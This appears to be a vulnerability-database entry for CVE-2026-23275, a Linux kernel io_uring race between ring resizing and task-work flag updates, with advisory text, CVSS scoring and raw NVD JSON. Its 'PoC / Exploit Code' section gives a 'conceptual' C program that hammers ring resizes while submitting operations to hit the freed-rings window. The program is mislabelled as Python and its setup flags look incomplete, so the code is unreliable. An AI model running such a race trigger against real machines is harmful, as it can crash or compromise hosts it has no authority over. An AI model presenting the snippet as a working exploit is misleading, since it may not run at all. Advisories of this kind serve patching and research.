Security Vulnerability Report
中文
CVE-2026-23275 CVSS 7.8 HIGH

CVE-2026-23275

Published: 2026-03-20 09:16:13
Last Modified: 2026-04-02 15:16:30
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: io_uring: ensure ctx->rings is stable for task work flags manipulation If DEFER_TASKRUN | SETUP_TASKRUN is used and task work is added while the ring is being resized, it's possible for the OR'ing of IORING_SQ_TASKRUN to happen in the small window of swapping into the new rings and the old rings being freed. Prevent this by adding a 2nd ->rings pointer, ->rings_rcu, which is protected by RCU. The task work flags manipulation is inside RCU already, and if the resize ring freeing is done post an RCU synchronize, then there's no need to add locking to the fast path of task work additions. Note: this is only done for DEFER_TASKRUN, as that's the only setup mode that supports ring resizing. If this ever changes, then they too need to use the io_ctx_mark_taskrun() helper.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel(修复补丁前)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#include <liburing.h> #include <pthread.h> #include <stdio.h> #include <unistd.h> // Conceptual PoC for CVE-2026-23275 // This code attempts to trigger the race condition between // io_uring resize and task work addition. struct io_uring ring; void* resize_thread_func(void* arg) { while (1) { // Constantly resize the ring to trigger the vulnerable window // where ctx->rings is swapped and old one is freed. io_uring_queue_resize(&ring, 32); io_uring_queue_resize(&ring, 64); } return NULL; } void* task_work_thread_func(void* arg) { while (1) { // Submit operations to trigger task work. // This attempts to hit the ctx->rings access during the swap. struct io_uring_sqe *sqe = io_uring_get_sqe(&ring); if (sqe) { io_uring_prep_nop(sqe); io_uring_submit(&ring); } } return NULL; } int main() { // Setup io_uring with DEFER_TASKRUN struct io_uring_params p = {0}; // Note: Actual flag values depend on kernel headers p.flags = IORING_SETUP_DEFER_TASKRUN; if (io_uring_queue_init_params(32, &ring, &p) < 0) { perror("io_uring_queue_init_params"); return 1; } pthread_t t1, t2; pthread_create(&t1, NULL, resize_thread_func, NULL); pthread_create(&t2, NULL, task_work_thread_func, NULL); pthread_join(t1, NULL); pthread_join(t2, NULL); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23275", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-20T09:16:13.223", "lastModified": "2026-04-02T15:16:29.997", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring: ensure ctx->rings is stable for task work flags manipulation\n\nIf DEFER_TASKRUN | SETUP_TASKRUN is used and task work is added while\nthe ring is being resized, it's possible for the OR'ing of\nIORING_SQ_TASKRUN to happen in the small window of swapping into the\nnew rings and the old rings being freed.\n\nPrevent this by adding a 2nd ->rings pointer, ->rings_rcu, which is\nprotected by RCU. The task work flags manipulation is inside RCU\nalready, and if the resize ring freeing is done post an RCU synchronize,\nthen there's no need to add locking to the fast path of task work\nadditions.\n\nNote: this is only done for DEFER_TASKRUN, as that's the only setup mode\nthat supports ring resizing. If this ever changes, then they too need to\nuse the io_ctx_mark_taskrun() helper."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nio_uring: asegurar que ctx-&gt;rings sea estable para la manipulación de las banderas de trabajo de tarea\n\nSi se usa DEFER_TASKRUN | SETUP_TASKRUN y se añade trabajo de tarea mientras el anillo está siendo redimensionado, es posible que la operación OR de IORING_SQ_TASKRUN ocurra en la pequeña ventana de intercambio a los nuevos anillos y la liberación de los anillos antiguos.\n\nEsto se previene añadiendo un segundo puntero -&gt;rings, -&gt;rings_rcu, el cual está protegido por RCU. La manipulación de las banderas de trabajo de tarea ya está dentro de RCU, y si la liberación del anillo redimensionado se realiza después de una sincronización RCU, entonces no hay necesidad de añadir bloqueo a la ruta rápida de las adiciones de trabajo de tarea.\n\nNota: esto solo se hace para DEFER_TASKRUN, ya que ese es el único modo de configuración que soporta el redimensionamiento de anillos. Si esto alguna vez cambia, entonces ellos también necesitarán usar la función auxiliar io_ctx_mark_taskrun()."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "references": [{"url": "https://git.kernel.org/stable/c/46dc07d5f31411cc023f3bf1f4a23a07bf6e0ed1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/7cc4530b3e952d4a5947e1e55d06620d8845d4f5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/96189080265e6bb5dde3a4afbaf947af493e3f82", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.